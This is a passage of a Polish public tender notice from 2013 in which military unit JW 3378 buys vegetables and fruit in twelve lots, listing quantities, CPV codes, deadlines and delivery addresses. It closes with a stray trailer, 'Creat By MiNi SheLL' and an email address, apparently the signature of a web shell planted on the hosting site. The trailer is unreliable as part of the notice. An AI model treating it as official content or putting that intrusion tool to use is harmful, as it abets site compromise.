b)potwierdzić dokumentami lub oświadczyć, że oferuje produkty wytworzone w ramach produkcji pierwotnej zgodnie z zasadami GMP (Dobrej Praktyki Produkcji) - dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r. o ubezpieczeniu społecznym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.),
c)posiadać wdrożony system HACCP (nie dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r. o ubezpieczeniu społecznym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.)
d) oświadczenie o posiadaniu przez Wykonawcę polisy ubezpieczeniowej na czas obowiązywania umowy - wzór zał. nr 10 do SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.16wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa nr 3378 Drawsko Pomorskie
ul. Główna 1, 78-513 OLESZNO
(budynek  nr 42, kancelaria nr 110).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 10:30, miejsce: Jednostka Wojskowa nr 3378 Drawsko Pomorskie
ul. Główna 1, 78-513 OLESZNO
(budynek  nr 42 kancelaria nr 108 - Kancelaria Jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Warzywa gr. I - Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. I realizowana do Jednostki Wojskowej 3378

Buraki ćwikłowe - 8000 kg
Marchew - 14000 kg
Pietruszka korzeniowa - 5000 kg
Seler korzeniowy - 5000 kg
Cebula - 6000 kg
Por - 5000 kg
Kapusta biała - 6000 kg
Kapusta czerwona - 4000 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1, 78-513 OLESZNO
Telefon do magazynu żywnościowego: 94 747 40 87
Telefon do kancelarii żywnościowej: 94 747 42 17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.11-7, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.12-4, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Warzywa gr. I: Złocieniec, Złocieniec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. I realizowana do Jednostki Wojskowej 3378
Złocieniec,
Buraki ćwikłowe - 460 kg
Marchew - 420 kg
Pietruszka korzeniowa - 370 kg
Seler korzeniowy - 310 kg
Cebula - 540 kg
Por - 270 kg
Kapusta biała - 300 kg
Kapusta czerwona - 250 kg
Złocieniec-Przedszkole
Buraki ćwikłowe - 140 kg
Marchew - 380 kg
Pietruszka korzeniowa - 30 kg
Seler korzeniowy - 90 kg
Cebula - 60 kg
Por - 30 kg
Kapusta biała - 100 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków 4, 78-524 ZŁOCIENIEC
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 94 363 75 40
Magazyn  Przedszkola ul. Pancerniaków 5, 78-524 ZŁOCIENIEC
Telefon do magazynu przedszkola: 94 363 73 89.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.11-7, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.12-4, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Warzywa gr. I - Wałcz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. I realizowana do Jednostki Wojskowej 3378
Buraki ćwikłowe - 500 kg
Marchew - 500 kg
Pietruszka korzeniowa - 500 kg
Seler korzeniowy - 500 kg
Cebula - 500 kg
Por - 500 kg
Kapusta biała - 500 kg
Kapusta czerwona - 500 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24, 78-600 WAŁCZ
Telefon do magazynu żywnościowego: 67 250 20 85
Telefon do kancelarii żywnościowej: 67 250 20 80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.11-7, 03.22.11.13-1, 03.22.14.10-3, 03.22.11.12-4, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Warzywa gr. I: Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. I realizowana do Jednostki Wojskowej 3378

Mirosławiec-Nadarzyce
Buraki ćwikłowe - 1000 kg
Marchew - 1500 kg
Pietruszka korzeniowa - 600 kg
Seler korzeniowy - 600 kg
Cebula - 800 kg
Por - 800 kg
Kapusta biała - 800 kg
Kapusta czerwona - 785 kg
Mirosławiec-Przedszkole
Buraki ćwikłowe - 100 kg
Marchew - 210 kg
Pietruszka korzeniowa - 35 kg
Seler korzeniowy - 35 kg
Cebula - 50 kg
Por - 45 kg
Kapusta biała - 35 kg
Kapusta czerwona - 15 kg

Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 3299
78-651 MIROSŁAWIEC GÓRNY
Telefon do kancelarii żywnościowej: 67 250 57 88 
Magazyn żywnościowy  Przedszkola 
 ul. Osiedle XXX-lecia LLP,  78-651 MIROSŁAWIEC
Telefon do magazynu przedszkola: 67 250 57 02.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.11-7, 03.22.11.13-1, 03.22.11.12-4, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Warzywa gr. II - Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. II realizowana do Jednostki Wojskowej 3378
Fasola szparagowa - 2500 kg
Papryka słodka - 1800 kg
Pomidory - 10 000 kg
Ogórki - 8 000 kg
Sałata - 7 000 kg
Brokuły - 1 000 kg
Kapusta włoska - 2 000 kg
Kapusta pekińska - 2 000 kg
Kapusta brukselska - 1 000 kg
Kalafior - 1 000 kg
Rzodkiewka - 2 200 kg
Natka pietruszki - 500 kg
Koperek zielony - 400 kg
Szczypiorek - 500 kg
Czosnek - 200 kg
Pieczarki - 1 000 kg

Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1, 78-513 OLESZNO
Telefon do magazynu żywnościowego: 94 747 40 87
Telefon do kancelarii żywnościowej: 94 747 42 17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.14.30-9, 03.22.11.14-8, 03.22.12.12-5, 03.22.14.20-6, 03.22.14.40-2, 03.22.12.70-9, 03.22.13.10-2, 03.22.12.40-0, 03.22.12.60-6, 03.22.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Warzywa gr. II: Złocieniec, Złocieniec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. II realizowana do Jednostki Wojskowej 3378

Złocieniec
Czarna rzepa - 260 kg
Fasola szparagowa - 350 kg
Papryka słodka - 350 kg
Pomidory - 450 kg
Ogórki - 400 kg
Sałata - 250 kg
Brokuły - 400 kg
Kapusta włoska - 350 kg
Kapusta pekińska - 340 kg
Kapusta brukselska - 100 kg
Kalafior - 210 kg
Rzodkiewka - 130 kg
Natka pietruszki - 92 kg
Koperek zielony - 92 kg
Szczypiorek - 89 kg
Czosnek - 45 kg
Pieczarki - 555 kg
Złocieniec-Przedszkole;
Czarna rzepa - 40 kg
Pomidory - 50 kg
Ogórki - 70 kg
Sałata - 30 kg
Kapusta pekińska - 60 kg
Kapusta brukselska - 50 kg
Kalafior - 40 kg
Rzodkiewka - 20 kg
Natka pietruszki - 8 kg
Koperek zielony - 8 kg
Szczypiorek - 11 kg
Czosnek - 5 kg
Pieczarki - 45 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków 4, 78-524 ZŁOCIENIEC
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 94 363 75 40
Magazyn  Przedszkola ul. Pancerniaków 5, 78-524 ZŁOCIENIEC
Telefon do magazynu przedszkola: 94 363 73 89.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.14.30-9, 03.22.11.14-8, 03.22.12.12-5, 03.22.14.20-6, 03.22.14.40-2, 03.22.12.70-9, 03.22.13.10-2, 03.22.12.60-6, 03.22.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Warzywa gr. II - Wałcz;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. II realizowana do Jednostki Wojskowej 3378
Czarna rzepa - 150 kg
Fasola szparagowa - 300 kg
Papryka słodka - 300 kg
Pomidory - 800 kg
Ogórki - 700 kg
Sałata - 350 kg
Brokuły - 300 kg
Kapusta włoska - 300 kg
Kapusta pekińska - 300 kg
Kapusta brukselska - 350 kg
Kalafior - 350 kg
Rzodkiewka - 120 kg
Natka pietruszki - 100 kg
Koperek zielony - 100 kg
Szczypiorek - 100 kg
Czosnek - 20 kg
Pieczarki - 200 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24, 78-600 WAŁCZ
Telefon do magazynu żywnościowego: 67 250 20 85
Telefon do kancelarii żywnościowej: 67 250 20 80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-7, 03.22.14.30-9, 03.22.11.14-8, 03.22.14.20-6, 03.22.14.40-2, 03.22.13.10-2, 03.22.12.40-0, 03.22.12.60-6, 03.22.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Warzywa gr. II - Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa warzyw gr. II realizowana do Jednostki Wojskowej 3378
Mirosławiec-Nadarzyce,
Czarna rzepa - 100 kg
Fasola szparagowa - 200 kg
Papryka słodka - 285 kg
Pomidory - 660 kg
Ogórki - 750 kg
Sałata - 80 kg
Brokuły - 500 kg
Kapusta włoska - 500 kg
Kapusta pekińska - 470 kg
Kapusta brukselska - 100 kg
Kalafior - 275 kg
Rzodkiewka - 85 kg
Natka pietruszki - 195 kg
Koperek zielony - 195 kg
Szczypiorek - 195 kg
Czosnek - 20 kg
Pieczarki - 485 kg
Mirosławiec-Przedszkole
Papryka słodka - 15 kg
Pomidory - 40 kg
Ogórki - 50 kg
Sałata - 20 kg
Kapusta pekińska - 30 kg
Kalafior - 25 kg
Rzodkiewka - 15 kg
Natka pietruszki - 5 kg
Koperek zielony - 5 kg
Szczypiorek - 5 kg
Pieczarki - 15 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 3299
78-651 MIROSŁAWIEC GÓRNY
Telefon do kancelarii żywnościowej: 67 250 57 88 
Magazyn żywnościowy  Przedszkola 
 ul. Osiedle XXX-lecia LLP,  78-651 MIROSŁAWIEC
Telefon do magazynu przedszkola: 67 250 57 02.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.14.30-9, 03.22.11.14-8, 03.22.12.12-5, 03.22.14.20-6, 03.22.12.70-9, 03.22.13.10-2, 03.22.12.40-0, 03.22.12.60-6, 03.22.12.30-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Owoce gr. I - Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa owoców gr. I realizowana do Jednostki Wojskowej 3378
Banany - 5000 kg
Cytryny - 4000 kg
Pomarańcze - 5000 kg
Mandarynki - 5000 kg
Grejpfruty - 600 kg
Arbuz - 2000 kg
Kiwi - 1500 kg
Morele - 1500 kg
Brzoskwinie - 2000 kg
Winogrona - 1000 kg
Jabłka - 40 000 kg
Gruszki - 5 000 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1, 78-513 OLESZNO
Telefon do magazynu żywnościowego: 94 747 40 87
Telefon do kancelarii żywnościowej: 94 747 42 17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.21.11-4, 03.22.23.32-9, 03.22.22.10-8, 03.22.22.30-4, 03.22.23.22-6, 03.22.23.21-9, 03.22.21.18-3, 03.22.23.31-2, 03.22.22.20-1, 03.22.23.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 - Owoce gr. I: Złocieniec, Złocieniec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa owoców gr. I realizowana do Jednostki Wojskowej 3378
Złocieniec,
Banany - 250 kg
Cytryny - 500 kg
Pomarańcze - 500 kg
Mandarynki - 300 kg
Grejpfruty - 100 kg
Arbuz - 240 kg
Kiwi - 220 kg
Morele - 200 kg
Brzoskwinie - 140 kg
Winogrona - 300 kg
Jabłka - 320 kg
Gruszki - 500 kg
Złocieniec-Przedszkole;
Banany - 250 kg
Mandarynki - 100 kg
Arbuz - 60 kg
Kiwi - 80 kg
Brzoskwinie - 60
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków 4, 78-524 ZŁOCIENIEC
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 94 363 75 40
Magazyn  Przedszkola ul. Pancerniaków 5, 78-524 ZŁOCIENIEC
Telefon do magazynu przedszkola: 94 363 73 89.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.21.11-4, 03.22.23.32-9, 03.22.22.10-8, 03.22.22.30-4, 03.22.23.22-6, 03.22.23.21-9, 03.22.21.18-3, 03.22.23.31-2, 03.22.22.20-1, 03.22.23.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 - Owoce gr. I - Wałcz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa owoców gr. I realizowana do Jednostki Wojskowej 3378
Banany - 400 kg
Cytryny - 400 kg
Pomarańcze - 400 kg
Mandarynki - 400 kg
Grejpfruty - 200 kg
Arbuz - 400 kg
Kiwi - 300 kg
Morele - 200 kg
Brzoskwinie - 300 kg
Winogrona - 300 kg
Jabłka - 4 000 kg
Gruszki - 2 000 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24, 78-600 WAŁCZ
Telefon do magazynu żywnościowego: 67 250 20 85
Telefon do kancelarii żywnościowej: 67 250 20 80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.21.11-4, 03.22.23.32-9, 03.22.22.10-8, 03.22.22.30-4, 03.22.23.22-6, 03.22.23.21-9, 03.22.21.18-3, 03.22.23.31-2, 03.22.22.20-1, 03.22.23.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 - Owoce gr. I: Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa owoców gr. I realizowana do Jednostki Wojskowej 3378
Mirosławiec-Nadarzyce
Banany - 1200 kg
Cytryny - 485 kg
Pomarańcze - 1 500 kg
Mandarynki - 1 500 kg
Grejpfruty - 300 kg
Arbuz - 300 kg
Kiwi - 200 kg
Morele - 200 kg
Brzoskwinie - 500 kg
Winogrona - 500 kg
Jabłka - 3 250 kg
Gruszki - 1 925 kg
Mirosławiec-Przedszkole
Banany - 100 kg
Cytryny - 15 kg
Pomarańcze - 50 kg
Mandarynki - 40 kg
Jabłka - 250 kg
Gruszki - 75 kg
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 3299
78-651 MIROSŁAWIEC GÓRNY
Telefon do kancelarii żywnościowej: 67 250 57 88 
Magazyn żywnościowy  Przedszkola 
 ul. Osiedle XXX-lecia LLP,  78-651 MIROSŁAWIEC
Telefon do magazynu przedszkola: 67 250 57 02.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7, 03.22.21.11-4, 03.22.23.32-9, 03.22.22.10-8, 03.22.22.30-4, 03.22.23.22-6, 03.22.23.21-9, 03.22.21.18-3, 03.22.23.31-2, 03.22.22.20-1, 03.22.23.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com